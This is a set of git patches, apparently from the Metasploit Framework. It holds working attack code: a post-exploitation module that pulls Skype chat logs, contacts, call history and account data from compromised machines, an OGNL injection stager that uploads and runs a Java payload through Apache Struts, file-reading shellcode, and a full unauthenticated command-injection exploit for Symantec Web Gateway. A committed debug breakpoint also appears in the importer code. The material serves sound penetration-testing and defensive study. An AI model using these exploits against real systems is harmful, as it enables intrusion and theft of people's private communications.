From b302f50dbe72f246065cdeadd801498258f8df09 Mon Sep 17 00:00:00 2001
From: Carlos Perez <carlos_perez@darkoperator.com>
Date: Tue, 5 Jun 2012 19:11:30 -0400
Subject: [PATCH 01/18] Initial version of the module supporting Windows and
 OSX

---
 modules/post/multi/gather/skype_enum.rb | 267 ++++++++++++++++++++++++
 1 file changed, 267 insertions(+)
 create mode 100644 modules/post/multi/gather/skype_enum.rb

diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb
new file mode 100644
index 0000000000..5d11c877c9
--- /dev/null
+++ b/modules/post/multi/gather/skype_enum.rb
@@ -0,0 +1,267 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'csv'
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/user_profiles'
+
+require 'msf/core/post/osx/system'
+
+
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Windows::UserProfiles
+	
+	include Msf::Post::OSX::System
+
+	
+	
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'Multi Gather Skype User Data Enumeration',
+				'Description'   => %q{
+					This module will enumerate the Skype accounts settings, contact list, call history, chat logs,
+					file transfer history and voicemail log saving all the data in to CSV files for analysis.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+				'Version'       => '$Revision$',
+				'Platform'      => [ 'windows', 'osx' ],
+				'SessionTypes'  => [ 'meterpreter' ]
+			))
+	end
+
+	# Run Method for when run command is issued
+	def run
+		# syinfo is only on meterpreter sessions
+		print_status("Running module for Skype enumeration against #{sysinfo['Computer']}") if not sysinfo.nil?
+		
+		# Ensure that SQLite3 gem is installed
+		begin
+			require 'sqlite3'
+		rescue LoadError
+			print_error("SQLite3 is not available, and we are not able to parse the database.")
+			return
+		end
+
+		if sysinfo['OS']=~ /Mac OS X/
+			# Iterate thru each user profile on as OSX System for users not in the default install
+			users = get_nonsystem_accounts.collect {|p| if p['uid'].to_i > 500; p; end }.compact
+			users.each do |p|
+				if check_skype("#{p['dir']}/Library/Application Support/", p['name'])
+					db_in_loot = download_db(p)
+					process_db(db_in_loot,p['name'])
+				end
+			end
+		else
+			# Iterate thru each user profile in a Windows System using Meterpreter Post API
+			grab_user_profiles().each do |p|
+				if check_skype(p['AppData'],p['UserName'])
+					db_in_loot = download_db(p)
+					process_db(db_in_loot,p['UserName'])
+				end
+			end
+		end
+	end
+
+	# Check if Skype is installed. Returns true or false.
+	def check_skype(path, user)
+		session.fs.dir.foreach(path) do |dir|
+			if dir =~ /Skype/
+				print_good("Skype account found for #{user}")
+				return true
+			end
+		end
+		print_error("Skype is not installed for #{user}")
+		return false
+	end
+
+	# Download file using Meterpreter functionality and returns path in loot for the file
+	def download_db(profile)
+		if sysinfo['OS'] =~ /Mac OS X/
+			file = session.fs.file.search("#{profile['dir']}///Library/Application Support/Skype/","main.db",true)
+		else
+			file = session.fs.file.search("#{profile['AppData']}\\Skype","main.db",true)
+		end
+		
+		file_loc = store_loot("skype.config",
+				"binary/db",
+				session,
+				"main.db",
+				"Skype Configuration database for #{profile['UserName']}"
+			)
+
+		file.each do |db|
+			maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
+			print_status("Downloading #{maindb}")
+			session.fs.file.download_file(file_loc,maindb)
+			print_good("Configuration database saved to #{file_loc}")
+		end
+
+		return file_loc
+	end
+
+	# Saves rows returned from a query to a given CSV file
+	def save_csv(data,file)
+		CSV.open(file, "w") do |csvwriter|
+			data.each do |record|
+				csvwriter << record
+			end
+		end
+	end
+	# Extracts the data from the DB in to a CSV file
+	def process_db(db_path,user)
+		db = SQLite3::Database.new(db_path)
+
+		# Extract information for accounts configured in Skype
+		print_status("Enumerating accounts")
+		user_rows = db.execute2('SELECT "skypeout_balance_currency", "skypeout_balance", "skypeout_precision",
+					"skypein_numbers", "subscriptions", "offline_callforward", "service_provider_info",
+					"registration_timestamp", "nr_of_other_instances", "partner_channel_status",
+					"flamingo_xmpp_status", "owner_under_legal_age", "type", "skypename",
+					"pstnnumber", "fullname", "birthday", "gender", "languages", "country",
+					"province", "city", "phone_home", "phone_office", "phone_mobile", "emails",
+					"homepage", "about", "profile_timestamp", "received_authrequest",
+					"displayname", "refreshing", "given_authlevel", "aliases", "authreq_timestamp",
+					"mood_text", "timezone", "nrof_authed_buddies", "ipcountry",
+					"given_displayname", "availability", "lastonline_timestamp",
+					"assigned_speeddial", "lastused_timestamp", "assigned_comment", "alertstring",
+					"avatar_timestamp", "mood_timestamp", "rich_mood_text", "synced_email",
+					"verified_email", "verified_company" FROM Accounts;')
+
+		# Check if an account exists and if it does enumerate if not exit.
+		if user_rows.length > 1
+			user_info = store_loot("skype.accounts",
+						"text/plain", session,"" ,
+						"skype_accounts.csv",
+						"Skype User #{user} Account information from configuration database."
+					)
+			print_good("Saving account information to #{user_info}")
+			save_csv(user_rows,user_info)
+		else
+			print_error("No skype accounts are configured for #{user}")
+			return
+		end
+	
+		# Extract chat log from the database
+		print_status("Extracting chat message log.")
+		cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner",
+					"timestamp", "body_xml", "remote_id" FROM "Messages" WHERE type == 61;')
+		chat_log = store_loot("#skype.chat",
+						"text/plain", session,"" ,
+						"skype_chatlog.csv",
+						"Skype User #{user} chat log from configuration database."
+					)
+
+		if cl_rows.length > 1
+			print_good("Saving chat log to #{chat_log}")
+			save_csv(cl_rows, chat_log)
+		else
+			print_error("No chat logs where found!")
+		end
+
+		# Extract file transfer history
+		print_status("Extracting file transfer history")
+		ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", "starttime",
+					"finishtime", "filepath", "filename", "filesize", "bytestransferred", 
+					"convo_id", "accepttime" FROM "Transfers";')
+
+		file_transfer = store_loot("skype.filetransfer",
+					"text/csv",
+					session,
+					"",
+					"skype_filetransfer.csv",
+					"Skype User #{user} file transfer history."
+				)
+		# Check that we have actual file transfers to report
+		if ft_rows.length > 1
+			print_good("Saving file transfer history to #{file_transfer}")
+			save_csv(ft_rows, file_transfer)
+		else
+			print_error("No file transfer history was found!")
+		end
+
+		# Extract voicemail history
+		print_status("Extracting voicemail history")
+		vm_rows = db.execute2('SELECT "type", "partner_handle", "partner_dispname", "status",
+					"subject", "timestamp", "duration", "allowed_duration", "playback_progress",
+					"convo_id", "chatmsg_guid", "notification_id", "flags", "size", "path",
+					"xmsg" FROM "Voicemails";')
+
+		voicemail = store_loot("skype.voicemail",
+					"text/csv",
+					session,
+					"",
+					"skype_voicemail.csv",
+					"Skype User #{user} voicemail history."
+				)
+
+		if vm_rows.length > 1
+			print_good("Saving voicemail history to #{voicemail}")
+			save_csv(vm_rows, voicemail)
+		else
+			print_error("No voicemail history was found!")
+		end
+
+		# Extracting call log
+		print_status("Extracting call log")
+		call_rows = db.execute2('SELECT "begin_timestamp", "topic","host_identity", "mike_status",
+					"duration", "soundlevel", "name", "is_incoming", "is_conference", "is_on_hold",
+					"start_timestamp", "quality_problems", "current_video_audience",
+					"premium_video_sponsor_list", "conv_dbid" FROM "Calls";')
+
+		call_log = store_loot("skype.callhistory",
+					"text/csv",
+					session,
+					"",
+					"skype_callhistory.csv",
+					"Skype User #{user} call history."
+				)
+		if call_rows.length > 1
+			print_good("Saving call log to #{call_log}")
+			save_csv(call_rows, call_log)
+		else
+			print_error("No call log was found!")
+		end
+
+		# Extracting contact list
+		print_status("Extracting contact list")
+		ct_rows = db.execute2('SELECT  "skypename", "pstnnumber", "aliases", "fullname",
+					"birthday", "languages", "country", "province", "city", "phone_home",
+					"phone_office", "phone_mobile", "emails", "homepage", "about", "mood_text",
+					"ipcountry", "lastonline_timestamp",  "displayname",  "given_displayname",
+					"assigned_speeddial", "assigned_comment","assigned_phone1",
+					"assigned_phone1_label", "assigned_phone2", "assigned_phone2_label",
+					"assigned_phone3", "assigned_phone3_label", "popularity_ord", "isblocked",
+					"main_phone", "phone_home_normalized", "phone_office_normalized",
+					"phone_mobile_normalized", "verified_email", "verified_company"
+					FROM "Contacts";')
+
+		contact_log = store_loot("skype.contactlist",
+					"text/csv",
+					session,
+					"",
+					"skype_contactlist.csv",
+					"Skype User #{user} contact list."
+				)
+		if ct_rows.length > 1
+			print_good("Saving contact list to #{contact_log}")
+			save_csv(ct_rows, contact_log)
+		end
+	end
+end
\ No newline at end of file

From b004f35354b9512f612232063a3a40dcf62d9840 Mon Sep 17 00:00:00 2001
From: Carlos Perez <carlos_perez@darkoperator.com>
Date: Wed, 6 Jun 2012 16:28:42 -0400
Subject: [PATCH 02/18] Change failure of loading gem message to be in par with
 other gem error messages in the framework, also date is better represented in
 the CSV with UTC value

---
 modules/post/multi/gather/skype_enum.rb | 59 ++++++++++++++-----------
 1 file changed, 34 insertions(+), 25 deletions(-)

diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb
index 5d11c877c9..4280effac0 100644
--- a/modules/post/multi/gather/skype_enum.rb
+++ b/modules/post/multi/gather/skype_enum.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
 		begin
 			require 'sqlite3'
 		rescue LoadError
-			print_error("SQLite3 is not available, and we are not able to parse the database.")
+			print_error("Failed to load sqlite3, try 'gem install sqlite3'")
 			return
 		end
 
@@ -132,22 +132,26 @@ class Metasploit3 < Msf::Post
 		print_status("Enumerating accounts")
 		user_rows = db.execute2('SELECT "skypeout_balance_currency", "skypeout_balance", "skypeout_precision",
 					"skypein_numbers", "subscriptions", "offline_callforward", "service_provider_info",
-					"registration_timestamp", "nr_of_other_instances", "partner_channel_status",
-					"flamingo_xmpp_status", "owner_under_legal_age", "type", "skypename",
-					"pstnnumber", "fullname", "birthday", "gender", "languages", "country",
-					"province", "city", "phone_home", "phone_office", "phone_mobile", "emails",
-					"homepage", "about", "profile_timestamp", "received_authrequest",
+					datetime("timestamp","unixepoch")"registration_timestamp",
+					"nr_of_other_instances", "partner_channel_status", "flamingo_xmpp_status",
+					"owner_under_legal_age", "type", "skypename", "pstnnumber", "fullname",
+					"birthday", "gender", "languages", "country", "province", "city", "phone_home",
+					"phone_office", "phone_mobile", "emails", "homepage", "about",
+					datetime("profile_timestamp","unixepoch"), "received_authrequest",
 					"displayname", "refreshing", "given_authlevel", "aliases", "authreq_timestamp",
 					"mood_text", "timezone", "nrof_authed_buddies", "ipcountry",
-					"given_displayname", "availability", "lastonline_timestamp",
-					"assigned_speeddial", "lastused_timestamp", "assigned_comment", "alertstring",
-					"avatar_timestamp", "mood_timestamp", "rich_mood_text", "synced_email",
+					"given_displayname", "availability", datetime("lastonline_timestamp","unixepoch"),
+					"assigned_speeddial", datetime("lastused_timestamp","unixepoch"),
+					"assigned_comment", "alertstring", datetime("avatar_timestamp","unixepoch"),
+					datetime("mood_timestamp","unixepoch"), "rich_mood_text", "synced_email",
 					"verified_email", "verified_company" FROM Accounts;')
 
 		# Check if an account exists and if it does enumerate if not exit.
 		if user_rows.length > 1
 			user_info = store_loot("skype.accounts",
-						"text/plain", session,"" ,
+						"text/plain", 
+						session,
+						"",
 						"skype_accounts.csv",
 						"Skype User #{user} Account information from configuration database."
 					)
@@ -159,11 +163,14 @@ class Metasploit3 < Msf::Post
 		end
 	
 		# Extract chat log from the database
-		print_status("Extracting chat message log.")
+		print_status("Extracting chat message log")
 		cl_rows = db.execute2('SELECT "chatname", "convo_id", "author", "dialog_partner",
-					"timestamp", "body_xml", "remote_id" FROM "Messages" WHERE type == 61;')
-		chat_log = store_loot("#skype.chat",
-						"text/plain", session,"" ,
+					datetime("timestamp","unixepoch"), "body_xml",
+					"remote_id" FROM "Messages" WHERE type == 61;')
+		chat_log = store_loot("skype.chat",
+						"text/plain", 
+						session,
+						"",
 						"skype_chatlog.csv",
 						"Skype User #{user} chat log from configuration database."
 					)
@@ -177,9 +184,10 @@ class Metasploit3 < Msf::Post
 
 		# Extract file transfer history
 		print_status("Extracting file transfer history")
-		ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", "starttime",
-					"finishtime", "filepath", "filename", "filesize", "bytestransferred", 
-					"convo_id", "accepttime" FROM "Transfers";')
+		ft_rows = db.execute2('SELECT "partner_handle", "partner_dispname", 
+					datetime("starttime","unixepoch"), datetime("finishtime","unixepoch"),
+					"filepath", "filename", "filesize", "bytestransferred",
+					"convo_id", datetime("accepttime","unixepoch") FROM "Transfers";')
 
 		file_transfer = store_loot("skype.filetransfer",
 					"text/csv",
@@ -199,9 +207,9 @@ class Metasploit3 < Msf::Post
 		# Extract voicemail history
 		print_status("Extracting voicemail history")
 		vm_rows = db.execute2('SELECT "type", "partner_handle", "partner_dispname", "status",
-					"subject", "timestamp", "duration", "allowed_duration", "playback_progress",
-					"convo_id", "chatmsg_guid", "notification_id", "flags", "size", "path",
-					"xmsg" FROM "Voicemails";')
+					"subject", datetime("timestamp","unixepoch"), "duration", "allowed_duration",
+					"playback_progress", "convo_id", "chatmsg_guid", "notification_id", "flags",
+					"size", "path", "xmsg" FROM "Voicemails";')
 
 		voicemail = store_loot("skype.voicemail",
 					"text/csv",
@@ -220,9 +228,10 @@ class Metasploit3 < Msf::Post
 
 		# Extracting call log
 		print_status("Extracting call log")
-		call_rows = db.execute2('SELECT "begin_timestamp", "topic","host_identity", "mike_status",
-					"duration", "soundlevel", "name", "is_incoming", "is_conference", "is_on_hold",
-					"start_timestamp", "quality_problems", "current_video_audience",
+		call_rows = db.execute2('SELECT datetime("begin_timestamp","unixepoch"),
+					"topic","host_identity", "mike_status", "duration", "soundlevel", "name",
+					"is_incoming", "is_conference", "is_on_hold",
+					datetime("start_timestamp","unixepoch"), "quality_problems", "current_video_audience",
 					"premium_video_sponsor_list", "conv_dbid" FROM "Calls";')
 
 		call_log = store_loot("skype.callhistory",
@@ -244,8 +253,8 @@ class Metasploit3 < Msf::Post
 		ct_rows = db.execute2('SELECT  "skypename", "pstnnumber", "aliases", "fullname",
 					"birthday", "languages", "country", "province", "city", "phone_home",
 					"phone_office", "phone_mobile", "emails", "homepage", "about", "mood_text",
-					"ipcountry", "lastonline_timestamp",  "displayname",  "given_displayname",
-					"assigned_speeddial", "assigned_comment","assigned_phone1",
+					"ipcountry", datetime("lastonline_timestamp","unixepoch"), "displayname",
+					"given_displayname", "assigned_speeddial", "assigned_comment","assigned_phone1",
 					"assigned_phone1_label", "assigned_phone2", "assigned_phone2_label",
 					"assigned_phone3", "assigned_phone3_label", "popularity_ord", "isblocked",
 					"main_phone", "phone_home_normalized", "phone_office_normalized",

From b4d33fb85a371e2b40debb9d36f05f4d269fff17 Mon Sep 17 00:00:00 2001
From: Michael Schierl <schierlm@gmx.de>
Date: Sat, 9 Jun 2012 21:52:57 +0200
Subject: [PATCH 03/18] Add ARCH_JAVA support to
 struts_code_exec_exception_delegator

---
 .../struts_code_exec_exception_delegator.rb   | 52 ++++++++++++++++++-
 1 file changed, 50 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index 805b2545dd..ad013800aa 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -29,7 +29,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Johannes Dahse', # Vulnerability discovery and PoC
 					'Andreas Nusser', # Vulnerability discovery and PoC
 					'juan vazquez', # Metasploit module
-					'sinn3r' # Metasploit module
+					'sinn3r', # Metasploit module
+					'mihi' # ARCH_JAVA support
 				],
 			'License'        => MSF_LICENSE,
 			'Version'        => '$Revision: $',
@@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'EDB', '18329'],
 					[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']
 				],
-			'Platform'      => [ 'win', 'linux'],
+			'Platform'      => [ 'win', 'linux', 'java'],
 			'Privileged'     => true,
 			'Targets'        =>
 				[
@@ -56,6 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
 								'Platform' => 'linux'
 						}
 					],
+					[ 'Java Universal',
+						{
+								'Arch' => ARCH_JAVA,
+								'Platform' => 'java'
+						},
+					]
 				],
 			'DisclosureDate' => 'Jan 06 2012',
 			'DefaultTarget' => 0))
@@ -73,6 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri = String.new(datastore['TARGETURI'])
 		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
 		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
+		uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,CMD,'')%2b'") if target['Platform'] == 'java'
 		uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
 
 		vprint_status("Attempting to execute: #{cmd}")
@@ -120,6 +128,44 @@ class Metasploit3 < Msf::Exploit::Remote
 		@payload_exe = "/tmp/" + file
 	end
 
+	def java_upload_part(part, filename, append = 'false')
+		cmd = ""
+		cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
+		cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
+		cmd << "#f.close()"
+		execute_command(cmd)
+	end
+
+	def java_stager
+		@payload_exe = rand_text_alphanumeric(4+rand(4)) + ".jar"
+		append = 'false'
+		jar = payload.encoded_jar.pack
+
+		chunk_length = 384 # 512 bytes when base64 encoded
+
+		while(jar.length > chunk_length)
+			java_upload_part(jar[0, chunk_length], @payload_exe, append)
+			jar = jar[chunk_length, jar.length - chunk_length]
+			append='true'
+		end
+		java_upload_part(jar, @payload_exe, append)
+
+		cmd = ""
+		# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
+		cmd << "#q.setAccessible(true),#q.set(null,true),"
+		cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
+		cmd << "#q.setAccessible(true),#q.set(null,false),"
+		# create classloader
+		cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+		# load class
+		cmd << "#c=#cl.loadClass('metasploit.Payload'),"
+		# invoke main method
+		cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
+		cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
+		execute_command(cmd)
+	end
+
 	def on_new_session(client)
 		if target['Platform'] == 'linux'
 			print_status("Deleting #{@payload_exe} payload file")
@@ -142,6 +188,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				linux_stager
 			when 'win'
 				windows_stager
+			when 'java'
+				java_stager
 			else
 				raise RuntimeError, 'Unsupported target platform!'
 		end

From 881ec8d920c776102889311248af5d6d9596dd4d Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sun, 10 Jun 2012 13:19:22 -0500
Subject: [PATCH 04/18] Make the description clear that it only reads 4k,
 default datastore['FD'] to 1

---
 modules/payloads/singles/linux/x86/read_file.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb
index cfcd09c71f..57f23d36b3 100644
--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -16,7 +16,7 @@ module Metasploit3
 		super(merge_info(info,
 			'Name'          => 'Linux Read File',
 			'Version'       => '',
-			'Description'   => 'Read a file from the local file system, and write it back out to the specified file descriptor',
+			'Description'   => 'Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor',
 			'Author'        => 'hal',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'linux',
@@ -25,13 +25,13 @@ module Metasploit3
 		# Register exec options
 		register_options(
 			[
-				OptString.new('FILE',   [ true,  "The file to read" ]),
-				OptString.new('FD',     [ false,  "The file descriptor to write output to" ]),
+				OptString.new('PATH',   [ true,  "The file path to read" ]),
+				OptString.new('FD',     [ true,  "The file descriptor to write output to", 1 ]),
 			], self.class)
 	end
 
 	def generate_stage
-		fd = datastore['FD'] || 1
+		fd = datastore['FD']
 
 		payload_data =<<-EOS
 			jmp file
@@ -63,7 +63,7 @@ module Metasploit3
 
 			file:
 				call open
-				db "#{datastore['FILE']}", 0x00
+				db "#{datastore['PATH']}", 0x00
 		EOS
 
 		Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string

From efcb206cdfb4c6bea55ec03ef39eb0af505d7238 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Sun, 10 Jun 2012 14:38:14 -0500
Subject: [PATCH 05/18] Correct a typo

---
 modules/exploits/windows/fileformat/ms12_005.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb
index 760c4af01f..da22678f79 100644
--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			p = file.sub(path+'/','')
 
 			if File.directory?(file)
-				print_status("Packging directory: #{file}")
+				print_status("Packaging directory: #{file}")
 				zip.add_file(p)
 			else
 				on_file_read(p, file) do |fname, buf|

From 74c6eb6f78ca4be31ab37625a257938bf8b9fac4 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Sun, 10 Jun 2012 14:45:15 -0500
Subject: [PATCH 06/18] Change the title and add a Microsoft reference.

This is a MS bug, therefore it's important to point out which
bulletin it belongs to.
---
 modules/exploits/windows/browser/ms11_093_ole32.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb
index 16a0e5c476..b7b6344e0f 100644
--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => "Microsoft Windows OLE Object File Handling Remote Code Execution",
+			'Name'           => "MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution",
 			'Description'    => %q{
 					This module exploits a type confusion vulnerability in the OLE32 component of
 				Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'MSB', 'MS11-093'],
 					[ 'CVE', '2011-3400' ],
 					[ 'OSVDB', '77663'],
 					[ 'BID', '50977' ],

From b908ccff0f8537d971ef01901fa0865ee20e74d4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sun, 10 Jun 2012 22:38:58 +0200
Subject: [PATCH 07/18] Added module for CVE-2012-0297

---
 .../linux/http/symantec_web_gateway_exec.rb   | 97 +++++++++++++++++++
 .../linux/http/symantec_web_gateway_lfi.rb    |  2 +-
 2 files changed, 98 insertions(+), 1 deletion(-)
 create mode 100644 modules/exploits/linux/http/symantec_web_gateway_exec.rb

diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
new file mode 100644
index 0000000000..1f82d8522e
--- /dev/null
+++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
@@ -0,0 +1,97 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
+			'Description'    => %q{
+					This module exploits a command injection vulnerability found in Symantec Web
+				Gateway's HTTP service due to the insecure usage of the exec() function. This module
+				abuses the spywall/ipchange.php file to execute arbitrary OS commands without
+				authentication.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tenable Network Security', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2012-0297' ],
+					[ 'BID', '53444' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
+					[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00\x0d\x0a\x26",
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl',
+						}
+				},
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,
+			'Targets'        =>
+				[
+					['Symantec Web Gateway 5.0.2.8', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 17 2012",
+			'DefaultTarget'  => 0))
+	end
+
+
+	def check
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri'    => '/spywall/login.php'
+		})
+
+		if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		peer = "#{rhost}:#{rport}"
+
+		post_data = "subnet="
+		post_data << "\";" + payload.raw + ";#"
+
+		print_status("#{peer} - Sending Command injection")
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{uri}spywall/ipchange.php",
+			'data'   => post_data
+		})
+
+		# If the server doesn't return the default redirection, probably
+		# something is wrong
+		if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/
+			print_error("#{peer} - Probably command not executed, aborting!")
+			return
+		end
+
+	end
+
+
+end
diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
index 6fb1931ad4..40fea4e7f6 100644
--- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",
+			'Name'           => "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",
 			'Description'    => %q{
 					This module exploits a vulnerability found in Symantec Web Gateway's HTTP
 				service.  By injecting PHP code in the access log, it is possible to load it

From f9999a3033808507a79b969a4357c668a3ab87d0 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Sun, 10 Jun 2012 16:37:29 -0500
Subject: [PATCH 08/18] Add FusiuonVM Importer

This adds a nokogiri stream parser for XML reports from
Critical Watch's FusionVM.
---
 lib/msf/core/db.rb                  |  14 ++++
 lib/rex/parser/fusionvm_nokogiri.rb | 108 ++++++++++++++++++++++++++++
 2 files changed, 122 insertions(+)
 create mode 100644 lib/rex/parser/fusionvm_nokogiri.rb

diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 3823264ef1..9d53dcb299 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -10,6 +10,7 @@ require 'rex/parser/burp_session_nokogiri'
 require 'rex/parser/ci_nokogiri'
 require 'rex/parser/wapiti_nokogiri'
 require 'rex/parser/openvas_nokogiri'
+require 'rex/parser/fusionvm_nokogiri'
 
 # Legacy XML parsers -- these will be converted some day
 
@@ -2422,6 +2423,9 @@ class DBManager
 		if (firstline.index("<NeXposeSimpleXML"))
 			@import_filedata[:type] = "NeXpose Simple XML"
 			return :nexpose_simplexml
+		elsif (firstline.index("<FusionVM"))
+			@import_filedata[:type] = "FusionVM XML"
+			return :fusionvm_xml
 		elsif (firstline.index("<NexposeReport"))
 			@import_filedata[:type] = "NeXpose XML Report"
 			return :nexpose_rawxml
@@ -4336,6 +4340,15 @@ class DBManager
 		res
 	end
 
+	def import_fusionvm_xml(args={})
+		args[:wspace] ||= workspace
+		bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
+		doc = Rex::Parser::FusionVMDocument.new(args,self)
+		parser = ::Nokogiri::XML::SAX::Parser.new(doc)
+		parser.parse(args[:data])
+	end
+
+
 	#
 	# Import Nmap's -oX xml output
 	#
@@ -4390,6 +4403,7 @@ class DBManager
 			noko_args = args.dup
 			noko_args[:blacklist] = bl
 			noko_args[:wspace] = wspace
+			binding.pry
 			if block
 				yield(:parser, "Nokogiri v#{::Nokogiri::VERSION}")
 				import_nmap_noko_stream(noko_args) {|type, data| yield type,data }
